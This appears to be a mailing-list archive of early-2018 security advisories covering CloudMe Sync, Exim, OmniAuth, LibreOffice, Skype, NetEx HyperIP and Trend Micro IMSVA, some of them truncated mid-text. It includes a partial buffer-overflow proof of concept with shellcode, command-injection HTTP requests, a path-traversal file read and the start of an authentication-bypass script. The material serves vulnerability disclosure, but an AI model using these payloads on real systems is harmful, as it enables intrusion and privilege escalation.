CVE-2018-6892 CloudMe Sync <= v1.10.9 Unauthenticated Remote Buffer Overflow (hyp3rlinx / apparition security)

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CLOUDME-SYNC-UNAUTHENTICATED-REMOTE-BUFFER-OVERFLOW.txt
[+] ISR: Apparition Security  
[+] SSD Beyond Security Submission: 
https://blogs.securiteam.com/index.php/archives/3669


Vendor:
=
www.cloudme.com


Product:
===
CloudMe Sync <= v1.10.9

(CloudMe_1109.exe)
hash: 0e83351dbf86562a70d1999df7674aa0 

CloudMe is a file storage service operated by CloudMe AB that offers cloud 
storage, file synchronization and client software.
It features a blue folder that appears on all devices with the same content, 
all files are synchronized between devices.



Vulnerability Type:
===
Buffer Overflow



CVE Reference:
==
CVE-2018-6892



Security Issue:

Unauthenticated remote attackers that can connect to the "CloudMe Sync" client 
application listening on port , can send a malicious payload causing
a Buffer Overflow condition. This will result in an attacker controlling the 
programs execution flow and allowing arbitrary code execution on the victims PC.

CloudMe Sync client creates a socket listening on TCP Port  (0x22B8)

In Qt5Core:

00564DF1   . C74424 04 B822>MOV DWORD PTR SS:[ESP+4],22B8
00564DF9   . 890424 MOV DWORD PTR SS:[ESP],EAX
00564DFC   . FF15 B8738100  CALL DWORD PTR DS:[<&Qt5Network._ZN10QTc>;  
Qt5Netwo._ZN10QTcpServer6listenERK12QHostAddresst


C:\>netstat -ano | findstr 
TCP0.0.0.0:   0.0.0.0:0  LISTENING   15504
TCP[::]:  [::]:0 LISTENING   15504


Buffer Overflow:

EIP register will be overwritten at about 1075 bytes.

EAX 0001
ECX 76F698DA msvcrt.76F698DA
EDX 0035
EBX 41414141
ESP 0028D470
EBP 41414141
ESI 41414141
EDI 41414141
EIP 41414141

Stack Dump:
==

(508.524): Access violation - code c005 (first/second chance not available)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for 
ntdll.dll - 
eax= ebx= ecx=41414141 edx=778f353d esi= edi=
eip=41414141 esp=00091474 ebp=00091494 iopl=0 nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010246
41414141 ??  ???

Exploitation is very easy as ASLR SafeSEH are all set to false making the 
exploit portable and able to work across different operating systems.
We will therefore use Structured Exceptional Handler overwrite for our exploit.

e.g.

6FE6909D  0x6fe6909d : pop ebx # pop esi # ret 0x20 |  {PAGE_EXECUTE_READ} 
[libstdc++-6.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- 
(C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\libstdc++-6.dll)
00476795  0x00476795 : pop ebx # pop esi # ret 0x20 | startnull 
{PAGE_EXECUTE_READ} [CloudMe.exe] ASLR: False, Rebase: False, SafeSEH: False, 
OS: False, v-1.0- 
(C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\CloudMe.exe)
61E7B7F6  0x61e7b7f6 : pop ebx # pop esi # ret 0x20 |  {PAGE_EXECUTE_READ} 
[Qt5Gui.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.0.0 
(C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\Qt5Gui.dll)


0day Exploit POC:
==
import socket,struct

print 'CloudMe Sync v1.10.9'
print 'Unauthenticated Remote Buffer Overflow 0day'
print 'Discovery/credits: hyp3rlinx'
print 'apparition security\n'


#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


ip=raw_input('[+] CloudMe Target IP> ') 

nseh="\xEB\x06"+"\x90"*2#JMP
seh=struct.pack('https://www.cloudme.com/en/sync#
https://blogs.securiteam.com/index.php/archives/3669


POC Video URL:
=
https://vimeo.com/255280060



Network Access:
===
Remote



Severity:
=
High



Disclosure Timeline: 
=
SSD Vulnerability submission: January 17, 2018
Would like to acknowledge Beyond Security’s SSD program for the help with 
co-ordination of this vulnerability.
More details can be found on their blog at:

https://blogs.securiteam.com/index.php/archives/3669
February 11, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability da

[SECURITY] [DSA 4110-1] exim4 security update

[Salvatore Bonaccorso]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-4110-1   secur...@debian.org
https://www.debian.org/security/ Salvatore Bonaccorso
February 10, 2018 https://www.debian.org/security/faq
- -

Package: exim4
CVE ID : CVE-2018-6789
Debian Bug : 89

Meh Chang discovered a buffer overflow flaw in a utility function used
in the SMTP listener of Exim, a mail transport agent. A remote attacker
can take advantage of this flaw to cause a denial of service, or
potentially the execution of arbitrary code via a specially crafted
message.

For the oldstable distribution (jessie), this problem has been fixed
in version 4.84.2-2+deb8u5.

For the stable distribution (stretch), this problem has been fixed in
version 4.89-2+deb9u3.

We recommend that you upgrade your exim4 packages.

For the detailed security status of exim4 please refer to its security
tracker page at:
https://security-tracker.debian.org/tracker/exim4

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlp/OdZfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND
z0QGYw/8CEODJxVLvPJU1f6DhBJIaTaQrEt4EjXqTn8RbVI/DqzjWKE7tXuPxRO0
7e0x1MeAIqHWZasXJjuNQOdKdlyd3F9/foOP0uA8cImrv+0Tq62zYf/v85V3y6/O
l7I2SFvDtM5Jg2l562jpctjKY/wgGJ1DZ2K6bB4A1d8SUXZbTB801l2yzTOyk/R4
ESE2xpUhZaD37192mp5oNIi4SWnq+riORPgqwnrU47GR7xNhAL9XpsBZIqK/B0Yc
jSiiIdoto70tHpAukWH/Hf62cnq+kvFp1i8FlK3cO+VZTxCcE42HnOLpAjom1zHS
Psf33gOACPmOd+P/cTuB6w2isCZT2MpQiJwgvVCgePpPJUrRXjBBCurnU8XaHJFZ
Z0LX/Gj22clgOrI2NkeB6vHJC1bcoOxmbSZD7QDOMbX8sn9jeW7iiTf4E55GSXfr
o0pevsE5tbwsLwDz0j+gGIofaiDCPwA3hw4R6srTqvvq5r9UQSOkO5x+i/tIvZls
rzb78Ye9j322S3dVKOK0f8eQ/vbWdWPr6oPJhFQI13YbeQs1bixo36RF2GXwjz6w
z9VzJBhOaDNC2iGHirFv/ru2bR7sSCuN3lqpI+INwYtXI0YLIlACt05YDBufe+vW
srEJIc6V/iBGFsH1TcOp8iC9+Jb6RT7hsBZnDYDwO8Nb29TUwIY=
=adqv
-END PGP SIGNATURE-

[SECURITY] [DSA 4109-1] ruby-omniauth security update

[Luciano Bello]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

- -
Debian Security Advisory DSA-4109-1   secur...@debian.org
https://www.debian.org/security/ 
February 09, 2018 https://www.debian.org/security/faq
- -

Package: ruby-omniauth
CVE ID : CVE-2017-18076
Debian Bug : 888523

Lalith Rallabhandi discovered that OmniAuth, a Ruby library for
implementing multi-provider authentication in web applications,
mishandled and leaked sensitive information. An attacker with access to
the callback environment, such as in the case of a crafted web
application, can request authentication services from this module and
access to the CSRF token.

For the oldstable distribution (jessie), this problem has been fixed
in version 1.2.1-1+deb8u1.

For the stable distribution (stretch), this problem has been fixed in
version 1.3.1-1+deb9u1.

We recommend that you upgrade your ruby-omniauth packages.

For the detailed security status of ruby-omniauth please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/ruby-omniauth

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-

iQIzBAEBCAAdFiEEayzFlnvRveqeWJspbsLe9o/+N3QFAlp+Vf8ACgkQbsLe9o/+
N3RymRAAj5ygv8aqAZVGam3wRQ5eOux+kmSP3eBe1pYb+egLEdbtetFALbbq0GyF
OWE5BpIcq483FE06CaVpuBK1xIk6f5SiS0jYPzMRdlIcfidfCk1SWcHbQ/5H8koP
Gn3visVhHIPwecwdeDCKTpvWIHSBT9sLH3j971K8DdR9ICTWdvCGo92T4/Txy3oL
YDGUFD90oqZ/qGJ2uMazJydaxslCc5KS/pSv7w/daDiRVtK14pQAjBO6BYWYKFzg
tQYnl/kDwoFAhltB8mvpMOSbPK7s1Z2PKu49uT0x7EWZV19mv4jMwo2rZ137yQcu
duK1nXIIbhVtA/7d02FMTfdahXDl8EjRAwmuSpsZZeRmPe3irVN3Ghh93VURDBYh
cnJCoM1CjfAuVFz6nWOFE4oolQ/0CUSPUG5o+y5RGWwaImifOK5fc57lPqthiK4D
41+Fw1xQCJ5BwSig4zFPjRottB4etbzag1wvIhOKHnmpb0IHpweAbWsEs8PO1xG6
imbKc68UHZw3LMGHbIyTOKSHbqjVaF2pnYrX/SWhdgEshTMZ4lv0KMTAWPmPxL30
3i3bgl8QnSr93kA13C3Zbog0TfrHouEd2SaxAwfkIE1RR+vXeoqKgoVTu6SpAOoH
3M1QiigPLlzomKVYQe5a19j2dkAEIbnnuNtc+wZbI/3v0Me6PQU=
=oO+m
-END PGP SIGNATURE-

KL-001-2018-005 : NetEx HyperIP Local File Inclusion Vulnerability

[KoreLogic Disclosures]

KL-001-2018-005 : NetEx HyperIP Local File Inclusion Vulnerability

Title: NetEx HyperIP Local File Inclusion Vulnerability
Advisory ID: KL-001-2018-005
Publication Date: 2018.02.08
Publication URL: 
https://www.korelogic.com/Resources/Advisories/KL-001-2018-005.txt


1. Vulnerability Details

 Affected Vendor: NetEx
 Affected Product: HyperIP
 Affected Version: 6.1.0
 Platform: Embedded Linux
 CWE Classification: CWE-73: External Control of File Name or Path, 
CWE-592: Authentication Bypass Issues
 Impact: Arbitrary Filesystem Reads
 Attack vector: HTTPS

2. Vulnerability Description

 Local files can be included within the HTTP response given
 by logs.php

3. Technical Description

 Any arbitrary file, such as the one created in KL-001-2018-004, can
 be returned by the logs.php script.

   GET /logs.php?system=../../tmp/a.output&submit=Show+System+Log HTTP/1.1
   Host: 1.3.3.7
   Accept-Language: en-US,en;q=0.5
   DNT: 1
   Connection: close
   Upgrade-Insecure-Requests: 1

   HTTP/1.1 200 OK
   Date: Mon, 27 Mar 2017 13:07:51 GMT
   Server: Apache/2.2.3 (CentOS)
   X-Powered-By: PHP/5.1.6
   Content-Length: 502
   Connection: close
   Content-Type: text/html; charset=UTF-8

   
   
   
   
   
   

   Show System Log  [ Monday @ 08:07:51 ]
   uid=0(root) gid=0(root) 
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
   
   
   

4. Mitigation and Remediation Recommendation

 The vendor has released version 6.1.1 of HyperIP, which they state
 addresses this vulnerability.

5. Credit

 This vulnerability was discovered by Matt Bergin (@thatguylevel)
 of KoreLogic, Inc.

6. Disclosure Timeline

 2017.07.24 - KoreLogic submits vulnerability details to NetEx.
 2017.07.24 - NetEx confirms receipt.
 2017.08.16 - NetEx informs KoreLogic that this and other reported
  vulnerabilities have been addressed in the forthcoming
  release. ETA as of yet undetermined.
 2017.09.05 - 30 business days have elapsed since the vulnerability
  was reported to NetEx.
 2017.09.19 - NetEx informs KoreLogic that the forthcoming release
  6.1.1 is expected to ship at the end of January 2018.
 2017.09.26 - 45 business days have elapsed since the vulnerability
  was reported to NetEx.
 2017.12.01 - 90 business days have elapsed since the vulnerability
  was reported to NetEx.
 2018.01.17 - 120 business days have elapsed since the vulnerability
  was reported to NetEx.
 2018.01.23 - NetEx notifies KoreLogic that the HyperIP 6.1.1 release
  has gone live.
 2018.02.08 - KoreLogic public disclosure.

7. Proof of Concept

 See 3. Technical Description.


The contents of this advisory are copyright(c) 2018
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt



signature.asc
Description: OpenPGP digital signature

[SECURITY] [DSA 4111-1] libreoffice security update

[Moritz Muehlenhoff]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-4111-1   secur...@debian.org
https://www.debian.org/security/   Moritz Muehlenhoff
February 11, 2018 https://www.debian.org/security/faq
- -

Package: libreoffice
CVE ID : CVE-2018-6871

Mikhail Klementev, Ronnie Goodrich and Andrew Krasichkov discovered that
missing restrictions in the implementation of the WEBSERVICE function
in LibreOffice could result in the disclosure of arbitrary files
readable by the user who opens a malformed document.

For the stable distribution (stretch), this problem has been fixed in
version 1:5.2.7-1+deb9u2.

We recommend that you upgrade your libreoffice packages.

For the detailed security status of libreoffice please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/libreoffice

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAlqAUikACgkQEMKTtsN8
TjbAyg/8C7wZ/90enlE698ZzLgsRJyhgowyZKjWpwQco3P5735krH/u8O1yty9Ou
x+Shn4oY52y7GAK6i2k4IQKudURPIJkSUtbMJP5oBIvoobK3Q1moymp89V7o1mhi
aNsk/K6cmFlWrkQl651C/352UkjOyyH9hiRG1L+ee2XMYr6OmTHVN2s+gGH2f+Vh
CN3kzH/oM7DhHfNo67OEyPGeUxGOULzVjffYzINJqOJH2YONHD5cJ6/39jXms0RZ
QavLVTaKFhP041C1XOYbShnVdMz4bHPIHVq8ObL5F5uK/yk2Q7Se3g8FAm285FmX
0PHqjnBXT+MKpKhcLp4oE4va70DwLb4wGNFOmlmP87ngCsJVAmj2msxygdLFBzuP
5Ubn7C17Df5+e1aHMfc5hNP87DqjKQpT0UA+78YhX18cVr6dkL5saEzFAXEGl/6k
U4VJXRFKFHm3iuqMPSegnoKdV5R/ObenP1HISlQ+wGjz/2AIQHRaHPxJo7EpXMMO
ALT1ibObAhO22i+KSi707VZycX5qLIngEwN0TygR7hC4mj5Uuu+HxiWTD/tHpy9W
x2OfUOhWOpNSyNcf0va9FZIrLcykItyckXv6UwnnEcApqf62C/6YnsQEsABbHxcf
ll4NjUO6J+R295hRQc0DaxtXPRmIyX4OFrKT4kaLp2U2hc4OjOI=
=SiwU
-END PGP SIGNATURE-

Defense in depth -- the Microsoft way (part 51): Skype's home-grown updater allows escalation of privilege to SYSTEM

[Stefan Kanthak]

Hi @ll,

since about two or three years now, Microsoft offers Skype as
optional update on Windows/Microsoft Update.

JFTR: for Microsoft's euphemistic use of "update" see
  

Once installed, Skype uses its own proprietary update mechanism
instead of Windows/Microsoft Update: Skype periodically runs
"%ProgramFiles%\Skype\Updater\Updater.exe"
under the SYSTEM account.
When an update is available, Updater.exe copies/extracts another
executable as "%SystemRoot%\Temp\SKY.tmp" and executes it
using the command line
"%SystemRoot%\Temp\SKY.tmp" /QUIET

This executable is vulnerable to DLL hijacking: it loads at least
UXTheme.dll from its application directory %SystemRoot%\Temp\
instead from Windows' system directory.

An unprivileged (local) user who is able to place UXTheme.dll or
any of the other DLLs loaded by the vulnerable executable in
%SystemRoot%\Temp\ gains escalation of privilege to the SYSTEM
account.


The attack vector is well-known and well-documented as CAPEC-471:


Microsoft published plenty advice/guidance to avoid this beginner's
error: ,
,

and

... which their own developers and their QA but seem to ignore!


See 
for the same vulnerability in another Microsoft product!


stay tuned
Stefan Kanthak


Timeline:
~

2017-09-02vulnerability report sent to vendor

2017-09-03reply from vendor: "MSRC case 40550 opened"

2017-09-06notification from vendor's case manager: "report passed
  to product group for investigation"

2017-10-27reply from vendor's case manager:

  "The engineers provided me with an update on this case.
   They've reviewed the code and were able to reproduce
   the issue, but have determined that the fix will be
   implemented in a newer version of the product rather
   than a security update. The team is planning on shipping
   a newer version of the client, and this current version
   will slowly be deprecated. The installer would need a
   large code revision to prevent DLL injection, but all
   resources have been put toward development of the new
   client."

2018-02-09report published

KL-001-2018-004 : NetEx HyperIP Privilege Escalation Vulnerability

[KoreLogic Disclosures]

KL-001-2018-004 : NetEx HyperIP Privilege Escalation Vulnerability

Title: NetEx HyperIP Privilege Escalation Vulnerability
Advisory ID: KL-001-2018-004
Publication Date: 2018.02.08
Publication URL: 
https://www.korelogic.com/Resources/Advisories/KL-001-2018-004.txt


1. Vulnerability Details

 Affected Vendor: NetEx
 Affected Product: HyperIP
 Affected Version: 6.1.0
 Platform: Embedded Linux
 CWE Classification: CWE-592: Authentication Bypass Issues
 Impact: Privilege Escalation
 Attack vector: HTTPS

2. Vulnerability Description

 Privileges can be escalated by abusing writable paths found
 within the sudoers configuration file.

3. Technical Description

 The run script is modified with the attack payload.

   POST /hypmisc.php HTTP/1.1
   Host: 1.3.3.7
   Accept-Language: en-US,en;q=0.5
   Cookie: auth-token=b6b73844ce4df64f459948c5475a1096
   DNT: 1
   Connection: close
   Upgrade-Insecure-Requests: 1
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 90

   set_id=msglvl&set_val=$(echo /usr/bin/id >> 
/var/ftp/pub/updates/a.run)&perm=on&submit=Set

   HTTP/1.1 200 OK
   Date: Mon, 27 Mar 2017 07:21:38 GMT
   Server: Apache/2.2.3 (CentOS)
   X-Powered-By: PHP/5.1.6
   Expires: Thu, 19 Nov 1981 08:52:00 GMT
   Cache-Control: no-store, no-cache, must-revalidate, post-check=0, 
pre-check=0
   Pragma: no-cache
   Content-Length: 1048
   Connection: close
   Content-Type: text/html; charset=UTF-8

 The attack payload can now be executed.

   POST /hypmisc.php HTTP/1.1
   Host: 1.3.3.7
   Accept-Language: en-US,en;q=0.5
   Cookie: auth-token=b6b73844ce4df64f459948c5475a1096
   DNT: 1
   Connection: close
   Upgrade-Insecure-Requests: 1
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 91

   set_id=msglvl&set_val=$(sudo /var/ftp/pub/updates/a.run >> 
/tmp/a.output)&perm=on&submit=Set

   HTTP/1.1 200 OK
   Date: Mon, 27 Mar 2017 13:06:55 GMT
   Server: Apache/2.2.3 (CentOS)
   X-Powered-By: PHP/5.1.6
   Expires: Thu, 19 Nov 1981 08:52:00 GMT
   Cache-Control: no-store, no-cache, must-revalidate, post-check=0, 
pre-check=0
   Pragma: no-cache
   Content-Length: 1020
   Connection: close
   Content-Type: text/html; charset=UTF-8

 The output can now be read from the a.output file, which is a
 separate arbitrary file read issue detailed in KL-001-2018-005.

   GET /logs.php?system=../../tmp/a.output&submit=Show+System+Log HTTP/1.1
   Host: 1.3.3.7
   Accept-Language: en-US,en;q=0.5
   DNT: 1
   Connection: close
   Upgrade-Insecure-Requests: 1

   HTTP/1.1 200 OK
   Date: Mon, 27 Mar 2017 13:07:51 GMT
   Server: Apache/2.2.3 (CentOS)
   X-Powered-By: PHP/5.1.6
   Content-Length: 502
   Connection: close
   Content-Type: text/html; charset=UTF-8

   
   
   
   
   
   

   Show System Log  [ Monday @ 08:07:51 ]
   uid=0(root) gid=0(root) 
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
   
   
   

4. Mitigation and Remediation Recommendation

 The vendor has released version 6.1.1 of HyperIP, which they state
 addresses this vulnerability.

5. Credit

 This vulnerability was discovered by Matt Bergin (@thatguylevel)
 of KoreLogic, Inc.

6. Disclosure Timeline

 2017.07.24 - KoreLogic submits vulnerability details to NetEx.
 2017.07.24 - NetEx confirms receipt.
 2017.08.16 - NetEx informs KoreLogic that this and other reported
  vulnerabilities have been addressed in the forthcoming
  release. ETA as of yet undetermined.
 2017.09.05 - 30 business days have elapsed since the vulnerability
  was reported to NetEx.
 2017.09.19 - NetEx informs KoreLogic that the forthcoming release
  6.1.1 is expected to ship at the end of January 2018.
 2017.09.26 - 45 business days have elapsed since the vulnerability
  was reported to NetEx.
 2017.12.01 - 90 business days have elapsed since the vulnerability
  was reported to NetEx.
 2018.01.17 - 120 business days have elapsed since the vulnerability
  was reported to NetEx.
 2018.01.23 - NetEx notifies KoreLogic that the HyperIP 6.1.1 release
  has gone live.
 2018.02.08 - KoreLogic public disclosure.

7. Proof of Concept

 See 3. Technical Description.


The contents of this advisory are copyright(c) 2018
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized co

KL-001-2018-003 : NetEx HyperIP Post-Auth Command Execution

[KoreLogic Disclosures]

KL-001-2018-003 : NetEx HyperIP Post-Auth Command Execution

Title: NetEx HyperIP Post-Auth Command Execution
Advisory ID: KL-001-2018-003
Publication Date: 2018.02.08
Publication URL: 
https://www.korelogic.com/Resources/Advisories/KL-001-2018-003.txt


1. Vulnerability Details

 Affected Vendor: NetEx
 Affected Product: HyperIP
 Affected Version: 6.1.0
 Platform: Embedded Linux
 CWE Classification: CWE-78:  Improper Neutralization of Special Elements 
used in an OS Command, CWE-250: Execution
with Unnecessary Privileges
 Impact: Arbitrary Command Execution
 Attack vector: HTTPS

2. Vulnerability Description

 A command injection vulnerability can be leveraged to execute
 operating system commands.

3. Technical Description

 A POST variable is handled unsafely, allowing execution of arbitrary
 commands with the privileges of the webserver process.  In the below
 example, set_val= is used to copy an existing executable file into
 a writable directory.

   POST /hypmisc.php HTTP/1.1
   Host: 1.3.3.7
   Accept-Language: en-US,en;q=0.5
   Cookie: auth-token=b6b73844ce4df64f459948c5475a1096
   DNT: 1
   Connection: close
   Upgrade-Insecure-Requests: 1
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 99

   set_id=msglvl&set_val=$(cp /etc/profile.d/which-2.sh 
/var/ftp/pub/updates/a.run)&perm=on&submit=Set

   HTTP/1.1 200 OK
   Date: Mon, 27 Mar 2017 07:20:56 GMT
   Server: Apache/2.2.3 (CentOS)
   X-Powered-By: PHP/5.1.6
   Expires: Thu, 19 Nov 1981 08:52:00 GMT
   Cache-Control: no-store, no-cache, must-revalidate, post-check=0, 
pre-check=0
   Pragma: no-cache
   Content-Length: 1057
   Connection: close
   Content-Type: text/html; charset=UTF-8

4. Mitigation and Remediation Recommendation

 The vendor has released version 6.1.1 of HyperIP, which they state
 addresses this vulnerability.

5. Credit

 This vulnerability was discovered by Matt Bergin (@thatguylevel)
 of KoreLogic, Inc.

6. Disclosure Timeline

 2017.07.24 - KoreLogic submits vulnerability details to NetEx.
 2017.07.24 - NetEx confirms receipt.
 2017.08.16 - NetEx informs KoreLogic that this and other reported
  vulnerabilities have been addressed in the forthcoming
  release. ETA as of yet undetermined.
 2017.09.05 - 30 business days have elapsed since the vulnerability
  was reported to NetEx.
 2017.09.19 - NetEx informs KoreLogic that the forthcoming release
  6.1.1 is expected to ship at the end of January 2018.
 2017.09.26 - 45 business days have elapsed since the vulnerability
  was reported to NetEx.
 2017.12.01 - 90 business days have elapsed since the vulnerability
  was reported to NetEx.
 2018.01.17 - 120 business days have elapsed since the vulnerability
  was reported to NetEx.
 2018.01.23 - NetEx notifies KoreLogic that the HyperIP 6.1.1 release
  has gone live.
 2018.02.08 - KoreLogic public disclosure.

7. Proof of Concept

 See 3. Technical Description.


The contents of this advisory are copyright(c) 2018
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt



signature.asc
Description: OpenPGP digital signature

KL-001-2018-006 : Trend Micro IMSVA Management Portal Authentication Bypass

[KoreLogic Disclosures]

KL-001-2018-006 : Trend Micro IMSVA Management Portal Authentication Bypass

Title: Trend Micro IMSVA Management Portal Authentication Bypass
Advisory ID: KL-001-2018-006
Publication Date: 2018.02.08
Publication URL: 
https://www.korelogic.com/Resources/Advisories/KL-001-2018-006.txt


1. Vulnerability Details

 Affected Vendor: Trend Micro
 Affected Product: InterScan Mail Security Virtual Apppliance
 Affected Version: 9.1.0.1600
 Platform: Embedded Linux
 CWE Classification: CWE-522: Insufficiently Protected Credentials, 
CWE-219: Sensitive Data Under Web Root
 Impact: Authentication Bypass
 Attack vector: HTTPS

2. Vulnerability Description

 Any unauthenticated user can bypass the authentication process.

3. Technical Description

 The web application is plugin-based and allows widgets to
 be loaded into the application. A plugin which is loaded by
 default stores a log file of events in a directory which can be
 accessed by unauthenticated users. Files within this directory
 (such as /widget/repository/log/diagnostic.log) which contain
 cookie values can then be read, parsed, and session information
 extracted. A functional exploit is shown below.

4. Mitigation and Remediation Recommendation

 Trend Micro has released a Critical Patch update to the
 affected versions for this vulnerability. The advisory and
 links to the patch(es) are available from the following URL:

 https://success.trendmicro.com/solution/1119277

5. Credit

 This vulnerability was discovered by Matt Bergin (@thatguylevel)
 of KoreLogic, Inc.

6. Disclosure Timeline

 2017.08.11 - KoreLogic submits vulnerability details to Trend Micro.
 2017.08.11 - Trend Micro confirms receipt.
 2017.09.15 - KoreLogic asks for an update on the triage of the
  reported issue.
 2017.09.15 - Trend Micro informs KoreLogic that the issue is in
  remediation but there is no expected release date yet.
 2017.09.25 - 30 business days have elapsed since the vulnerability
  was reported to Trend Micro.
 2017.10.06 - Trend Micro informs KoreLogic that the issue will not
  be addressed before the 45 business-day deadline. They
  ask for additional time for the details to remain
  embargoed in order to complete QA on the proposed fix.
 2017.10.06 - KoreLogic agrees to extend the disclosure timeline.
 2017.10.17 - 45 business days have elapsed since the vulnerability
  was reported to Trend Micro.
 2017.11.02 - Trend Micro notifies KoreLogic that the Critical Patch
  for IMSVA 9.1 (Critical Patch 1682) has gone live,
  but they are still working on the patch for IMSVA 9.0.
 2017.11.07 - 60 business days have elapsed since the vulnerability
  was reported to Trend Micro.
 2017.12.21 - 90 business days have elapsed since the vulnerability
  was reported to Trend Micro.
 2017.12.28 - Trend Micro notifies KoreLogic that the IMSVA 9.0
  Critical Patch is being localized for foreign language
  customers. Expected release date is late January 2018.
 2018.01.18 - Trend Micro notifies KoreLogic that the expected release
  date for the IMSVA 9.0 Critical Patch and the advisory
  is to be January 31, 2018.
 2018.01.23 - 110 business days have elapsed since the vulnerability
  was reported to Trend Micro.
 2018.01.31 - Trend Micro releases the advisory associated with this
  vulnerability and the related Critical Patches.
 2018.02.08 - KoreLogic public disclosure.

7. Proof of Concept

#!/usr/bin/python3


from argparse import ArgumentParser
from ssl import _create_unverified_context
from time import mktime
from urllib.request import HTTPSHandler, HTTPError, Request, urlopen, 
build_opener


banner = '''Trendmicro IMSVA 9.1.0.1600 Management Portal Authentication Bypass
{}'''.format('-'*67)


class Exploit:
def __init__(self, args):
self.target_host = args.host
self.target_port = args.port
self.list_all = args.ls
self.sessions = []
self.session_latest_time = None
self.session_latest_id = None
self.sessions_active = []
return None

def is_target(self):
url_loginpage = 
Request('https://{}:{}/loginPage.imss'.format(self.target_host, 
self.target_port))
url_loginjsp = 
Request('https://{}:{}/jsp/framework/login.jsp'.format(self.target_host, 
self.target_port))
if urlopen(url_loginpage, 
context=_create_unverified_context()).getcode() == 200:
try:
urlopen(url_loginjsp, context=_create_unverified_context())
except HTTPError as e:
if e.code == 403:
return True
else:
   

KL-001-2018-002 : NetEx HyperIP Authentication Bypass

[KoreLogic Disclosures]

KL-001-2018-002 : NetEx HyperIP Authentication Bypass

Title: NetEx HyperIP Authentication Bypass
Advisory ID: KL-001-2018-002
Publication Date: 2018.02.08
Publication URL: 
https://www.korelogic.com/Resources/Advisories/KL-001-2018-002.txt


1. Vulnerability Details

 Affected Vendor: NetEx
 Affected Product: HyperIP
 Affected Version: 6.1.0
 Platform: Embedded Linux
 CWE Classification: CWE-592: Authentication Bypass Issues
 Impact: Authentication Bypass
 Attack vector: HTTPS

2. Vulnerability Description

 Authentication for the management application can be bypassed
 by recreating the algorithm used to create predictable valid
 cookies.

3. Technical Description

 Authentication can be bypassed using the function below.

   >>> from hashlib import md5
